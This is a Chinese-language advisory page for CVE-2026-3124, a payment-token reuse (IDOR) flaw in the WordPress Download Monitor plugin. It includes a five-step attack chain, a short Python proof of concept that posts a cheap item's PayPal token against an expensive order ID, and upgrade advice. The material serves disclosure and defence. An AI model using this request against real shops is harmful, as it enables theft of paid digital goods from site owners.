CVE-2026-3124 CVSS 7.5 高危

WordPress Download Monitor插件IDOR漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3124

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Download Monitor插件

漏洞概述

WordPress Download Monitor插件5.1.7及以下版本存在IDOR漏洞。攻击者无需认证即可利用executePayment()函数的验证缺失，通过复用低价商品的支付令牌完成高价值订单支付，导致付费数字商品被盗。

技术细节

该漏洞源于WordPress Download Monitor插件中的executePayment()函数缺少对用户控制参数的验证。攻击者首先购买一个低价商品，获取PayPal返回的有效交易令牌。随后，攻击者利用该令牌构造针对高价值订单的支付请求。由于插件未验证令牌与特定订单金额或ID之间的对应关系，系统错误地认为高价值订单已由该令牌支付，从而允许攻击者以低价完成高价商品的购买，绕过正常的支付逻辑。

攻击链分析

STEP 1

1. 获取令牌

攻击者在网站上购买一个价格极低的商品，完成支付流程并获取PayPal返回的有效交易令牌。

STEP 2

2. 锁定目标

攻击者浏览网站，选择一个高价值的付费数字商品，并记录或猜测其对应的订单ID（Order ID）。

STEP 3

3. 构造请求

攻击者构造对executePayment()函数的HTTP请求，将低价值商品的令牌与高价值商品的订单ID组合在一起发送。

STEP 4

4. 利用漏洞

由于插件未验证令牌与订单金额的匹配性，服务器接受该请求并将高价值订单标记为已支付。

STEP 5

5. 获取商品

攻击者成功以低价获取了高价值数字商品的下载权限或访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit concept for CVE-2026-3124
# Step 1: Attacker buys a cheap item and obtains a valid PayPal transaction token.
# Step 2: Attacker identifies the target Order ID of a high-value item.

target_url = "http://target-site.com/?download-monitor_execute_payment=1"
valid_token = "PAYPAL_TOKEN_FROM_CHEAP_ITEM"
target_order_id = "12345" # ID of the expensive order

# Craft the malicious request
payload = {
    "order_id": target_order_id,
    "token": valid_token # Reusing the cheap token for the expensive order
}

response = requests.post(target_url, data=payload)

if response.status_code == 200:
    print("[+] Potential exploit success. Check order status.")
else:
    print("[-] Exploit failed.")

影响范围

WordPress Download Monitor <= 5.1.7

防御指南

临时缓解措施

建议立即将WordPress Download Monitor插件升级到最新版本以修复此漏洞。如果暂时无法升级，应禁用插件的PayPal支付功能或下架所有付费数字产品，直到完成更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表